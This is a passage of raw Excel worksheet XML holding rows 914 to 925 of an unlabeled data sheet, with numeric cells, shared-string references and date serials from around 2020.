        <v>9</v>
      </c>
      <c r="AZ914">
        <v>4</v>
      </c>
      <c r="BA914" t="s">
        <v>17352</v>
      </c>
      <c r="BB914">
        <v>0</v>
      </c>
      <c r="BC914" t="s">
        <v>11633</v>
      </c>
      <c r="BD914" t="s">
        <v>11634</v>
      </c>
    </row>
    <row r="915" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A915">
        <v>2844</v>
      </c>
      <c r="B915" t="s">
        <v>7038</v>
      </c>
      <c r="C915" t="s">
        <v>157</v>
      </c>
      <c r="D915" t="s">
        <v>7039</v>
      </c>
      <c r="E915" t="s">
        <v>363</v>
      </c>
      <c r="F915" t="s">
        <v>364</v>
      </c>
      <c r="G915" s="1">
        <v>44106</v>
      </c>
      <c r="H915">
        <v>3958</v>
      </c>
      <c r="I915">
        <v>3958</v>
      </c>
      <c r="J915">
        <v>0</v>
      </c>
      <c r="K915">
        <v>0</v>
      </c>
      <c r="L915">
        <v>0</v>
      </c>
      <c r="M915">
        <v>0</v>
      </c>
      <c r="N915">
        <v>0</v>
      </c>
      <c r="O915">
        <v>0</v>
      </c>
      <c r="P915">
        <v>0</v>
      </c>
      <c r="Q915">
        <v>0</v>
      </c>
      <c r="R915">
        <v>0</v>
      </c>
      <c r="S915">
        <v>0</v>
      </c>
      <c r="T915">
        <v>1</v>
      </c>
      <c r="U915">
        <v>0</v>
      </c>
      <c r="V915">
        <v>0</v>
      </c>
      <c r="W915">
        <v>0</v>
      </c>
      <c r="X915">
        <v>0</v>
      </c>
      <c r="Y915">
        <v>0</v>
      </c>
      <c r="Z915">
        <v>0</v>
      </c>
      <c r="AA915">
        <v>0</v>
      </c>
      <c r="AB915">
        <v>0</v>
      </c>
      <c r="AC915">
        <v>0</v>
      </c>
      <c r="AD915">
        <v>0</v>
      </c>
      <c r="AE915">
        <v>10000</v>
      </c>
      <c r="AF915" t="s">
        <v>7040</v>
      </c>
      <c r="AG915">
        <v>60186</v>
      </c>
      <c r="AH915">
        <v>16</v>
      </c>
      <c r="AJ915">
        <v>264</v>
      </c>
      <c r="AK915" t="s">
        <v>2543</v>
      </c>
      <c r="AL915" t="s">
        <v>7041</v>
      </c>
      <c r="AM915" t="s">
        <v>7042</v>
      </c>
      <c r="AN915" t="s">
        <v>55</v>
      </c>
      <c r="AO915">
        <v>2020</v>
      </c>
      <c r="AP915">
        <v>81230883133</v>
      </c>
      <c r="AQ915" t="s">
        <v>7043</v>
      </c>
      <c r="AR915" t="s">
        <v>7044</v>
      </c>
      <c r="AS915" t="s">
        <v>371</v>
      </c>
      <c r="AT915" t="s">
        <v>58</v>
      </c>
      <c r="AU915">
        <v>25</v>
      </c>
      <c r="AV915">
        <v>1</v>
      </c>
      <c r="AW915">
        <v>10</v>
      </c>
      <c r="AX915">
        <v>0</v>
      </c>
      <c r="AY915">
        <v>3</v>
      </c>
      <c r="AZ915">
        <v>2</v>
      </c>
      <c r="BA915" t="s">
        <v>17374</v>
      </c>
      <c r="BB915" t="s">
        <v>15932</v>
      </c>
      <c r="BC915">
        <v>0</v>
      </c>
      <c r="BD915" t="s">
        <v>11074</v>
      </c>
    </row>
    <row r="916" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A916">
        <v>2810</v>
      </c>
      <c r="B916" t="s">
        <v>6474</v>
      </c>
      <c r="C916" t="s">
        <v>189</v>
      </c>
      <c r="D916" t="s">
        <v>7045</v>
      </c>
      <c r="E916" t="s">
        <v>142</v>
      </c>
      <c r="F916" t="s">
        <v>7046</v>
      </c>
      <c r="G916" s="1">
        <v>44074</v>
      </c>
      <c r="H916">
        <v>4019</v>
      </c>
      <c r="I916">
        <v>4019</v>
      </c>
      <c r="J916">
        <v>0</v>
      </c>
      <c r="K916">
        <v>1</v>
      </c>
      <c r="L916">
        <v>2</v>
      </c>
      <c r="M916">
        <v>0</v>
      </c>
      <c r="N916">
        <v>0</v>
      </c>
      <c r="O916">
        <v>0</v>
      </c>
      <c r="P916">
        <v>0</v>
      </c>
      <c r="Q916">
        <v>1</v>
      </c>
      <c r="R916">
        <v>8</v>
      </c>
      <c r="S916">
        <v>0</v>
      </c>
      <c r="T916">
        <v>0</v>
      </c>
      <c r="U916">
        <v>0</v>
      </c>
      <c r="V916">
        <v>150000</v>
      </c>
      <c r="W916">
        <v>8000</v>
      </c>
      <c r="X916">
        <v>0</v>
      </c>
      <c r="Y916">
        <v>0</v>
      </c>
      <c r="Z916">
        <v>0</v>
      </c>
      <c r="AA916">
        <v>0</v>
      </c>
      <c r="AB916">
        <v>300</v>
      </c>
      <c r="AC916">
        <v>5000</v>
      </c>
      <c r="AD916">
        <v>0</v>
      </c>
      <c r="AE916">
        <v>0</v>
      </c>
      <c r="AF916" t="s">
        <v>7047</v>
      </c>
      <c r="AG916">
        <v>97128</v>
      </c>
      <c r="AH916">
        <v>31</v>
      </c>
      <c r="AJ916">
        <v>461</v>
      </c>
      <c r="AK916" t="s">
        <v>1566</v>
      </c>
      <c r="AL916" t="s">
        <v>1567</v>
      </c>
      <c r="AM916" t="s">
        <v>7048</v>
      </c>
      <c r="AN916" t="s">
        <v>68</v>
      </c>
      <c r="AO916">
        <v>2018</v>
      </c>
      <c r="AP916">
        <v>81222420610</v>
      </c>
      <c r="AQ916">
        <v>81222420610</v>
      </c>
      <c r="AR916" t="s">
        <v>7049</v>
      </c>
      <c r="AS916" t="s">
        <v>71</v>
      </c>
      <c r="AT916" t="s">
        <v>72</v>
      </c>
      <c r="AU916">
        <v>24</v>
      </c>
      <c r="AV916">
        <v>0</v>
      </c>
      <c r="AW916">
        <v>5</v>
      </c>
      <c r="AX916">
        <v>1</v>
      </c>
      <c r="AY916">
        <v>1</v>
      </c>
      <c r="AZ916">
        <v>2</v>
      </c>
      <c r="BA916" t="s">
        <v>17343</v>
      </c>
      <c r="BB916">
        <v>0</v>
      </c>
      <c r="BC916" t="s">
        <v>9693</v>
      </c>
      <c r="BD916">
        <v>0</v>
      </c>
    </row>
    <row r="917" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A917">
        <v>2822</v>
      </c>
      <c r="B917" t="s">
        <v>7050</v>
      </c>
      <c r="C917" t="s">
        <v>157</v>
      </c>
      <c r="D917" t="s">
        <v>7051</v>
      </c>
      <c r="E917" t="s">
        <v>944</v>
      </c>
      <c r="F917" t="s">
        <v>2105</v>
      </c>
      <c r="G917" s="1">
        <v>44155</v>
      </c>
      <c r="H917">
        <v>4061</v>
      </c>
      <c r="I917">
        <v>4061</v>
      </c>
      <c r="J917">
        <v>2</v>
      </c>
      <c r="K917">
        <v>0</v>
      </c>
      <c r="L917">
        <v>1</v>
      </c>
      <c r="M917">
        <v>0</v>
      </c>
      <c r="N917">
        <v>0</v>
      </c>
      <c r="O917">
        <v>0</v>
      </c>
      <c r="P917">
        <v>4</v>
      </c>
      <c r="Q917">
        <v>2</v>
      </c>
      <c r="R917">
        <v>8</v>
      </c>
      <c r="S917">
        <v>10</v>
      </c>
      <c r="T917">
        <v>2</v>
      </c>
      <c r="U917">
        <v>300</v>
      </c>
      <c r="V917">
        <v>0</v>
      </c>
      <c r="W917">
        <v>500</v>
      </c>
      <c r="X917">
        <v>0</v>
      </c>
      <c r="Y917">
        <v>0</v>
      </c>
      <c r="Z917">
        <v>0</v>
      </c>
      <c r="AA917">
        <v>5000</v>
      </c>
      <c r="AB917">
        <v>2000</v>
      </c>
      <c r="AC917">
        <v>15000</v>
      </c>
      <c r="AD917">
        <v>10000</v>
      </c>
      <c r="AE917">
        <v>200000</v>
      </c>
      <c r="AF917" t="s">
        <v>7052</v>
      </c>
      <c r="AG917">
        <v>68472</v>
      </c>
      <c r="AH917">
        <v>16</v>
      </c>
      <c r="AJ917">
        <v>237</v>
      </c>
      <c r="AK917" t="s">
        <v>377</v>
      </c>
      <c r="AL917" t="s">
        <v>1147</v>
      </c>
      <c r="AM917" t="s">
        <v>7053</v>
      </c>
      <c r="AN917" t="s">
        <v>55</v>
      </c>
      <c r="AO917">
        <v>2014</v>
      </c>
      <c r="AP917">
        <v>333593473</v>
      </c>
      <c r="AQ917" t="s">
        <v>7054</v>
      </c>
      <c r="AR917" t="s">
        <v>7052</v>
      </c>
      <c r="AS917" t="s">
        <v>71</v>
      </c>
      <c r="AT917" t="s">
        <v>58</v>
      </c>
      <c r="AU917">
        <v>24</v>
      </c>
      <c r="AV917">
        <v>1</v>
      </c>
      <c r="AW917">
        <v>10</v>
      </c>
      <c r="AX917">
        <v>15</v>
      </c>
      <c r="AY917">
        <v>43</v>
      </c>
      <c r="AZ917">
        <v>47</v>
      </c>
      <c r="BA917" t="s">
        <v>17357</v>
      </c>
      <c r="BB917" t="s">
        <v>17359</v>
      </c>
      <c r="BC917" t="s">
        <v>11120</v>
      </c>
      <c r="BD917" t="s">
        <v>11121</v>
      </c>
    </row>
    <row r="918" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A918">
        <v>2837</v>
      </c>
      <c r="B918" t="s">
        <v>7055</v>
      </c>
      <c r="C918" t="s">
        <v>607</v>
      </c>
      <c r="D918" t="s">
        <v>7056</v>
      </c>
      <c r="E918" t="s">
        <v>363</v>
      </c>
      <c r="F918" t="s">
        <v>7057</v>
      </c>
      <c r="G918" s="1">
        <v>44081</v>
      </c>
      <c r="H918">
        <v>4099</v>
      </c>
      <c r="I918">
        <v>4099</v>
      </c>
      <c r="J918">
        <v>0</v>
      </c>
      <c r="K918">
        <v>0</v>
      </c>
      <c r="L918">
        <v>0</v>
      </c>
      <c r="M918">
        <v>0</v>
      </c>
      <c r="N918">
        <v>0</v>
      </c>
      <c r="O918">
        <v>0</v>
      </c>
      <c r="P918">
        <v>0</v>
      </c>
      <c r="Q918">
        <v>1</v>
      </c>
      <c r="R918">
        <v>0</v>
      </c>
      <c r="S918">
        <v>0</v>
      </c>
      <c r="T918">
        <v>1</v>
      </c>
      <c r="U918">
        <v>0</v>
      </c>
      <c r="V918">
        <v>0</v>
      </c>
      <c r="W918">
        <v>0</v>
      </c>
      <c r="X918">
        <v>0</v>
      </c>
      <c r="Y918">
        <v>0</v>
      </c>
      <c r="Z918">
        <v>0</v>
      </c>
      <c r="AA918">
        <v>0</v>
      </c>
      <c r="AB918">
        <v>1</v>
      </c>
      <c r="AC918">
        <v>0</v>
      </c>
      <c r="AD918">
        <v>0</v>
      </c>
      <c r="AE918">
        <v>4500</v>
      </c>
      <c r="AF918" t="s">
        <v>7058</v>
      </c>
      <c r="AG918">
        <v>77113</v>
      </c>
      <c r="AH918">
        <v>24</v>
      </c>
      <c r="AJ918">
        <v>370</v>
      </c>
      <c r="AK918" t="s">
        <v>7059</v>
      </c>
      <c r="AL918" t="s">
        <v>7060</v>
      </c>
      <c r="AM918" t="s">
        <v>7061</v>
      </c>
      <c r="AN918" t="s">
        <v>68</v>
      </c>
      <c r="AO918">
        <v>2017</v>
      </c>
      <c r="AP918">
        <v>85248483299</v>
      </c>
      <c r="AQ918" t="s">
        <v>7062</v>
      </c>
      <c r="AR918" t="s">
        <v>7058</v>
      </c>
      <c r="AS918" t="s">
        <v>71</v>
      </c>
      <c r="AT918" t="s">
        <v>72</v>
      </c>
      <c r="AU918">
        <v>20</v>
      </c>
      <c r="AV918">
        <v>0</v>
      </c>
      <c r="AW918">
        <v>3</v>
      </c>
      <c r="AX918">
        <v>0</v>
      </c>
      <c r="AY918">
        <v>8</v>
      </c>
      <c r="AZ918">
        <v>2</v>
      </c>
      <c r="BA918" t="s">
        <v>17371</v>
      </c>
      <c r="BB918">
        <v>0</v>
      </c>
      <c r="BC918">
        <v>0</v>
      </c>
      <c r="BD918" t="s">
        <v>10582</v>
      </c>
    </row>
    <row r="919" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A919">
        <v>4759</v>
      </c>
      <c r="B919" t="s">
        <v>7012</v>
      </c>
      <c r="C919" t="s">
        <v>157</v>
      </c>
      <c r="D919" t="s">
        <v>7063</v>
      </c>
      <c r="E919" t="s">
        <v>300</v>
      </c>
      <c r="F919" t="s">
        <v>7064</v>
      </c>
      <c r="G919" s="1">
        <v>44048</v>
      </c>
      <c r="H919">
        <v>4125</v>
      </c>
      <c r="I919">
        <v>4125</v>
      </c>
      <c r="J919">
        <v>2</v>
      </c>
      <c r="K919">
        <v>0</v>
      </c>
      <c r="L919">
        <v>2</v>
      </c>
      <c r="M919">
        <v>8</v>
      </c>
      <c r="N919">
        <v>6000</v>
      </c>
      <c r="O919">
        <v>0</v>
      </c>
      <c r="P919">
        <v>0</v>
      </c>
      <c r="Q919">
        <v>1</v>
      </c>
      <c r="R919">
        <v>100</v>
      </c>
      <c r="S919">
        <v>0</v>
      </c>
      <c r="T919">
        <v>1</v>
      </c>
      <c r="U919">
        <v>1000000</v>
      </c>
      <c r="V919">
        <v>0</v>
      </c>
      <c r="W919">
        <v>800</v>
      </c>
      <c r="X919">
        <v>5600</v>
      </c>
      <c r="Y919">
        <v>0</v>
      </c>
      <c r="Z919">
        <v>0</v>
      </c>
      <c r="AA919">
        <v>0</v>
      </c>
      <c r="AB919">
        <v>600</v>
      </c>
      <c r="AC919">
        <v>25000</v>
      </c>
      <c r="AD919">
        <v>0</v>
      </c>
      <c r="AE919">
        <v>381500</v>
      </c>
      <c r="AF919" t="s">
        <v>5216</v>
      </c>
      <c r="AG919">
        <v>60186</v>
      </c>
      <c r="AH919">
        <v>16</v>
      </c>
      <c r="AJ919">
        <v>264</v>
      </c>
      <c r="AK919" t="s">
        <v>2543</v>
      </c>
      <c r="AL919" t="s">
        <v>7065</v>
      </c>
      <c r="AM919" t="s">
        <v>7066</v>
      </c>
      <c r="AN919" t="s">
        <v>55</v>
      </c>
      <c r="AO919">
        <v>1989</v>
      </c>
      <c r="AP919" t="s">
        <v>7067</v>
      </c>
      <c r="AQ919" t="s">
        <v>7068</v>
      </c>
      <c r="AR919" t="s">
        <v>7068</v>
      </c>
      <c r="AS919" t="s">
        <v>71</v>
      </c>
      <c r="AT919" t="s">
        <v>58</v>
      </c>
      <c r="AU919">
        <v>20</v>
      </c>
      <c r="AV919">
        <v>1</v>
      </c>
      <c r="AW919">
        <v>335</v>
      </c>
      <c r="AX919">
        <v>606</v>
      </c>
      <c r="AY919">
        <v>42</v>
      </c>
      <c r="AZ919">
        <v>17</v>
      </c>
      <c r="BA919" t="s">
        <v>16653</v>
      </c>
      <c r="BB919" t="s">
        <v>14720</v>
      </c>
      <c r="BC919">
        <v>0</v>
      </c>
      <c r="BD919" t="s">
        <v>11309</v>
      </c>
    </row>
    <row r="920" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A920">
        <v>2862</v>
      </c>
      <c r="B920" t="s">
        <v>7069</v>
      </c>
      <c r="C920" t="s">
        <v>3013</v>
      </c>
      <c r="D920" t="s">
        <v>7070</v>
      </c>
      <c r="E920" t="s">
        <v>142</v>
      </c>
      <c r="F920" t="s">
        <v>143</v>
      </c>
      <c r="G920" s="1">
        <v>43999</v>
      </c>
      <c r="H920">
        <v>4197</v>
      </c>
      <c r="I920">
        <v>4197</v>
      </c>
      <c r="J920">
        <v>0</v>
      </c>
      <c r="K920">
        <v>6</v>
      </c>
      <c r="L920">
        <v>0</v>
      </c>
      <c r="M920">
        <v>0</v>
      </c>
      <c r="N920">
        <v>0</v>
      </c>
      <c r="O920">
        <v>0</v>
      </c>
      <c r="P920">
        <v>0</v>
      </c>
      <c r="Q920">
        <v>2</v>
      </c>
      <c r="R920">
        <v>0</v>
      </c>
      <c r="S920">
        <v>0</v>
      </c>
      <c r="T920">
        <v>1</v>
      </c>
      <c r="U920">
        <v>0</v>
      </c>
      <c r="V920">
        <v>1500</v>
      </c>
      <c r="W920">
        <v>0</v>
      </c>
      <c r="X920">
        <v>0</v>
      </c>
      <c r="Y920">
        <v>0</v>
      </c>
      <c r="Z920">
        <v>0</v>
      </c>
      <c r="AA920">
        <v>0</v>
      </c>
      <c r="AB920">
        <v>200</v>
      </c>
      <c r="AC920">
        <v>0</v>
      </c>
      <c r="AD920">
        <v>0</v>
      </c>
      <c r="AE920">
        <v>1500</v>
      </c>
      <c r="AF920" t="s">
        <v>7071</v>
      </c>
      <c r="AG920">
        <v>28290</v>
      </c>
      <c r="AH920">
        <v>4</v>
      </c>
      <c r="AJ920">
        <v>86</v>
      </c>
      <c r="AK920" t="s">
        <v>7072</v>
      </c>
      <c r="AL920" t="s">
        <v>7073</v>
      </c>
      <c r="AM920" t="s">
        <v>7074</v>
      </c>
      <c r="AN920" t="s">
        <v>68</v>
      </c>
      <c r="AO920">
        <v>2009</v>
      </c>
      <c r="AP920">
        <v>8127074312</v>
      </c>
      <c r="AQ920" t="s">
        <v>7075</v>
      </c>
      <c r="AR920" t="s">
        <v>7071</v>
      </c>
      <c r="AS920" t="s">
        <v>71</v>
      </c>
      <c r="AT920" t="s">
        <v>72</v>
      </c>
      <c r="AU920">
        <v>1</v>
      </c>
      <c r="AV920">
        <v>2</v>
      </c>
      <c r="AW920">
        <v>1</v>
      </c>
      <c r="AX920">
        <v>4</v>
      </c>
      <c r="AY920">
        <v>3</v>
      </c>
      <c r="AZ920">
        <v>5</v>
      </c>
      <c r="BA920" t="s">
        <v>17384</v>
      </c>
      <c r="BB920" t="s">
        <v>15935</v>
      </c>
      <c r="BC920" t="s">
        <v>11185</v>
      </c>
      <c r="BD920" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="921" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A921">
        <v>4571</v>
      </c>
      <c r="B921" t="s">
        <v>7076</v>
      </c>
      <c r="C921" t="s">
        <v>872</v>
      </c>
      <c r="D921" t="s">
        <v>7077</v>
      </c>
      <c r="E921" t="s">
        <v>142</v>
      </c>
      <c r="F921" t="s">
        <v>7078</v>
      </c>
      <c r="G921" s="1">
        <v>44140</v>
      </c>
      <c r="H921">
        <v>4254</v>
      </c>
      <c r="I921">
        <v>4254</v>
      </c>
      <c r="J921">
        <v>1</v>
      </c>
      <c r="K921">
        <v>0</v>
      </c>
      <c r="L921">
        <v>2</v>
      </c>
      <c r="M921">
        <v>0</v>
      </c>
      <c r="N921">
        <v>0</v>
      </c>
      <c r="O921">
        <v>0</v>
      </c>
      <c r="P921">
        <v>0</v>
      </c>
      <c r="Q921">
        <v>0</v>
      </c>
      <c r="R921">
        <v>2</v>
      </c>
      <c r="S921">
        <v>0</v>
      </c>
      <c r="T921">
        <v>0</v>
      </c>
      <c r="U921">
        <v>10000</v>
      </c>
      <c r="V921">
        <v>0</v>
      </c>
      <c r="W921">
        <v>2000</v>
      </c>
      <c r="X921">
        <v>0</v>
      </c>
      <c r="Y921">
        <v>0</v>
      </c>
      <c r="Z921">
        <v>0</v>
      </c>
      <c r="AA921">
        <v>0</v>
      </c>
      <c r="AB921">
        <v>0</v>
      </c>
      <c r="AC921">
        <v>1000</v>
      </c>
      <c r="AD921">
        <v>0</v>
      </c>
      <c r="AE921">
        <v>0</v>
      </c>
      <c r="AF921" t="s">
        <v>7079</v>
      </c>
      <c r="AG921">
        <v>94891</v>
      </c>
      <c r="AH921">
        <v>28</v>
      </c>
      <c r="AJ921">
        <v>396</v>
      </c>
      <c r="AK921" t="s">
        <v>7080</v>
      </c>
      <c r="AL921" t="s">
        <v>7081</v>
      </c>
      <c r="AM921" t="s">
        <v>7082</v>
      </c>
      <c r="AN921" t="s">
        <v>55</v>
      </c>
      <c r="AO921">
        <v>2019</v>
      </c>
      <c r="AP921" t="s">
        <v>7083</v>
      </c>
      <c r="AQ921" t="s">
        <v>7084</v>
      </c>
      <c r="AR921" t="s">
        <v>7085</v>
      </c>
      <c r="AU921">
        <v>350</v>
      </c>
      <c r="AV921">
        <v>0</v>
      </c>
      <c r="AW921">
        <v>6</v>
      </c>
      <c r="AX921">
        <v>2</v>
      </c>
      <c r="AY921">
        <v>3</v>
      </c>
      <c r="AZ921">
        <v>1</v>
      </c>
      <c r="BA921" t="s">
        <v>17387</v>
      </c>
      <c r="BB921" t="s">
        <v>16021</v>
      </c>
      <c r="BC921" t="s">
        <v>10334</v>
      </c>
      <c r="BD921" t="s">
        <v>9986</v>
      </c>
    </row>
    <row r="922" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A922">
        <v>2731</v>
      </c>
      <c r="B922" t="s">
        <v>7086</v>
      </c>
      <c r="C922" t="s">
        <v>157</v>
      </c>
      <c r="D922" t="s">
        <v>7087</v>
      </c>
      <c r="E922" t="s">
        <v>142</v>
      </c>
      <c r="F922" t="s">
        <v>4062</v>
      </c>
      <c r="G922" s="1">
        <v>44207</v>
      </c>
      <c r="H922">
        <v>4275</v>
      </c>
      <c r="I922">
        <v>4275</v>
      </c>
      <c r="J922">
        <v>2</v>
      </c>
      <c r="K922">
        <v>1</v>
      </c>
      <c r="L922">
        <v>3</v>
      </c>
      <c r="M922">
        <v>0</v>
      </c>
      <c r="N922">
        <v>0</v>
      </c>
      <c r="O922">
        <v>0</v>
      </c>
      <c r="P922">
        <v>0</v>
      </c>
      <c r="Q922">
        <v>30</v>
      </c>
      <c r="R922">
        <v>800</v>
      </c>
      <c r="S922">
        <v>0</v>
      </c>
      <c r="T922">
        <v>1</v>
      </c>
      <c r="U922">
        <v>1200000</v>
      </c>
      <c r="V922">
        <v>0</v>
      </c>
      <c r="W922">
        <v>40000</v>
      </c>
      <c r="X922">
        <v>0</v>
      </c>
      <c r="Y922">
        <v>0</v>
      </c>
      <c r="Z922">
        <v>0</v>
      </c>
      <c r="AA922">
        <v>0</v>
      </c>
      <c r="AB922">
        <v>21000</v>
      </c>
      <c r="AC922">
        <v>400000</v>
      </c>
      <c r="AD922">
        <v>0</v>
      </c>
      <c r="AE922">
        <v>400000</v>
      </c>
      <c r="AF922" t="s">
        <v>7088</v>
      </c>
      <c r="AG922">
        <v>68472</v>
      </c>
      <c r="AH922">
        <v>16</v>
      </c>
      <c r="AJ922">
        <v>237</v>
      </c>
      <c r="AK922" t="s">
        <v>377</v>
      </c>
      <c r="AL922" t="s">
        <v>1147</v>
      </c>
      <c r="AM922" t="s">
        <v>7089</v>
      </c>
      <c r="AN922" t="s">
        <v>55</v>
      </c>
      <c r="AO922">
        <v>2016</v>
      </c>
      <c r="AP922" t="s">
        <v>7090</v>
      </c>
      <c r="AQ922" t="s">
        <v>7091</v>
      </c>
      <c r="AR922" t="s">
        <v>7092</v>
      </c>
      <c r="AS922" t="s">
        <v>71</v>
      </c>
      <c r="AT922" t="s">
        <v>58</v>
      </c>
      <c r="AU922">
        <v>25</v>
      </c>
      <c r="AV922">
        <v>3</v>
      </c>
      <c r="AW922">
        <v>51</v>
      </c>
      <c r="AX922">
        <v>351</v>
      </c>
      <c r="AY922">
        <v>18</v>
      </c>
      <c r="AZ922">
        <v>11</v>
      </c>
      <c r="BA922" t="s">
        <v>17296</v>
      </c>
      <c r="BB922">
        <v>0</v>
      </c>
      <c r="BC922">
        <v>0</v>
      </c>
      <c r="BD922" t="s">
        <v>12671</v>
      </c>
    </row>
    <row r="923" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A923">
        <v>2856</v>
      </c>
      <c r="B923" t="s">
        <v>7012</v>
      </c>
      <c r="C923" t="s">
        <v>157</v>
      </c>
      <c r="D923" t="s">
        <v>7093</v>
      </c>
      <c r="E923" t="s">
        <v>142</v>
      </c>
      <c r="F923" t="s">
        <v>5048</v>
      </c>
      <c r="G923" s="1">
        <v>44116</v>
      </c>
      <c r="H923">
        <v>4326</v>
      </c>
      <c r="I923">
        <v>4326</v>
      </c>
      <c r="J923">
        <v>3</v>
      </c>
      <c r="K923">
        <v>0</v>
      </c>
      <c r="L923">
        <v>0</v>
      </c>
      <c r="M923">
        <v>4</v>
      </c>
      <c r="N923">
        <v>21000</v>
      </c>
      <c r="O923">
        <v>0</v>
      </c>
      <c r="P923">
        <v>0</v>
      </c>
      <c r="Q923">
        <v>50</v>
      </c>
      <c r="R923">
        <v>150</v>
      </c>
      <c r="S923">
        <v>0</v>
      </c>
      <c r="T923">
        <v>1</v>
      </c>
      <c r="U923">
        <v>2000000</v>
      </c>
      <c r="V923">
        <v>0</v>
      </c>
      <c r="W923">
        <v>0</v>
      </c>
      <c r="X923">
        <v>10500</v>
      </c>
      <c r="Y923">
        <v>0</v>
      </c>
      <c r="Z923">
        <v>0</v>
      </c>
      <c r="AA923">
        <v>0</v>
      </c>
      <c r="AB923">
        <v>15000</v>
      </c>
      <c r="AC923">
        <v>37500</v>
      </c>
      <c r="AD923">
        <v>0</v>
      </c>
      <c r="AE923">
        <v>381500</v>
      </c>
      <c r="AF923" t="s">
        <v>5216</v>
      </c>
      <c r="AG923">
        <v>60168</v>
      </c>
      <c r="AH923">
        <v>16</v>
      </c>
      <c r="AJ923">
        <v>264</v>
      </c>
      <c r="AK923" t="s">
        <v>2543</v>
      </c>
      <c r="AL923" t="s">
        <v>2543</v>
      </c>
      <c r="AM923" t="s">
        <v>7094</v>
      </c>
      <c r="AN923" t="s">
        <v>55</v>
      </c>
      <c r="AO923">
        <v>1985</v>
      </c>
      <c r="AP923">
        <v>62317491000</v>
      </c>
      <c r="AQ923" t="s">
        <v>7095</v>
      </c>
      <c r="AR923" t="s">
        <v>7096</v>
      </c>
      <c r="AS923" t="s">
        <v>71</v>
      </c>
      <c r="AT923" t="s">
        <v>58</v>
      </c>
      <c r="AU923">
        <v>5</v>
      </c>
      <c r="AV923">
        <v>0</v>
      </c>
      <c r="AW923">
        <v>384</v>
      </c>
      <c r="AX923">
        <v>575</v>
      </c>
      <c r="AY923">
        <v>90</v>
      </c>
      <c r="AZ923">
        <v>67</v>
      </c>
      <c r="BA923">
        <v>0</v>
      </c>
      <c r="BB923">
        <v>0</v>
      </c>
      <c r="BC923">
        <v>0</v>
      </c>
      <c r="BD923" t="s">
        <v>11376</v>
      </c>
    </row>
    <row r="924" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A924">
        <v>2820</v>
      </c>
      <c r="B924" t="s">
        <v>7097</v>
      </c>
      <c r="C924" t="s">
        <v>2308</v>
      </c>
      <c r="D924" t="s">
        <v>7098</v>
      </c>
      <c r="E924" t="s">
        <v>300</v>
      </c>
      <c r="F924" t="s">
        <v>7099</v>
      </c>
      <c r="G924" s="1">
        <v>44001</v>
      </c>
      <c r="H924">
        <v>4355</v>
      </c>
      <c r="I924">
        <v>4355</v>
      </c>
      <c r="J924">
        <v>2</v>
      </c>
      <c r="K924">
        <v>0</v>
      </c>
      <c r="L924">
        <v>3</v>
      </c>
      <c r="M924">
        <v>0</v>
      </c>
      <c r="N924">
        <v>0</v>
      </c>
      <c r="O924">
        <v>0</v>
      </c>
      <c r="P924">
        <v>0</v>
      </c>
      <c r="Q924">
        <v>2</v>
      </c>
      <c r="R924">
        <v>2</v>
      </c>
      <c r="S924">
        <v>0</v>
      </c>
      <c r="T924">
        <v>0</v>
      </c>
      <c r="U924">
        <v>120000</v>
      </c>
      <c r="V924">
        <v>0</v>
      </c>
      <c r="W924">
        <v>6000</v>
      </c>
      <c r="X924">
        <v>0</v>
      </c>
      <c r="Y924">
        <v>0</v>
      </c>
      <c r="Z924">
        <v>0</v>
      </c>
      <c r="AA924">
        <v>0</v>
      </c>
      <c r="AB924">
        <v>2000</v>
      </c>
      <c r="AC924">
        <v>8000</v>
      </c>
      <c r="AD924">
        <v>0</v>
      </c>
      <c r="AE924">
        <v>0</v>
      </c>
      <c r="AF924" t="s">
        <v>7100</v>
      </c>
      <c r="AG924">
        <v>98415</v>
      </c>
      <c r="AH924">
        <v>33</v>
      </c>
      <c r="AJ924">
        <v>485</v>
      </c>
      <c r="AK924" t="s">
        <v>2313</v>
      </c>
      <c r="AL924" t="s">
        <v>2314</v>
      </c>
      <c r="AM924" t="s">
        <v>7101</v>
      </c>
      <c r="AN924" t="s">
        <v>55</v>
      </c>
      <c r="AO924">
        <v>2020</v>
      </c>
      <c r="AP924" t="s">
        <v>7102</v>
      </c>
      <c r="AQ924" t="s">
        <v>7103</v>
      </c>
      <c r="AR924" t="s">
        <v>7100</v>
      </c>
      <c r="AS924" t="s">
        <v>371</v>
      </c>
      <c r="AT924" t="s">
        <v>72</v>
      </c>
      <c r="AU924">
        <v>25</v>
      </c>
      <c r="AV924">
        <v>1</v>
      </c>
      <c r="AW924">
        <v>3</v>
      </c>
      <c r="AX924">
        <v>1</v>
      </c>
      <c r="AY924">
        <v>15</v>
      </c>
      <c r="AZ924">
        <v>4</v>
      </c>
      <c r="BA924" t="s">
        <v>17355</v>
      </c>
      <c r="BB924" t="s">
        <v>17356</v>
      </c>
      <c r="BC924" t="s">
        <v>10642</v>
      </c>
      <c r="BD924" t="s">
        <v>11043</v>
      </c>
    </row>
    <row r="925" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A925">
        <v>2835</v>
      </c>
      <c r="B925" t="s">
        <v>7104</v>
      </c>
      <c r="C925" t="s">
        <v>2308</v>
      </c>
      <c r="D925" t="s">
        <v>7105</v>
      </c>
      <c r="E925" t="s">
        <v>142</v>
      </c>
      <c r="F925" t="s">
        <v>7106</v>
      </c>
      <c r="G925" s="1">
        <v>44006</v>
      </c>
      <c r="H925">
        <v>4364</v>
      </c>
      <c r="I925">
        <v>4364</v>
      </c>
      <c r="J925">
        <v>3</v>
      </c>
      <c r="K925">
        <v>0</v>
      </c>
      <c r="L925">
        <v>8</v>
      </c>
      <c r="M925">
        <v>0</v>
      </c>
      <c r="N925">
        <v>0</v>
      </c>
      <c r="O925">
        <v>0</v>
      </c>
      <c r="P925">
        <v>0</v>
      </c>
      <c r="Q925">
        <v>10</v>
      </c>
      <c r="R925">
        <v>10</v>
      </c>
      <c r="S925">
        <v>0</v>
      </c>
      <c r="T925">
        <v>1</v>
      </c>
      <c r="U925">
        <v>2000</v>
      </c>
      <c r="V925">
        <v>0</v>
      </c>
      <c r="W925">
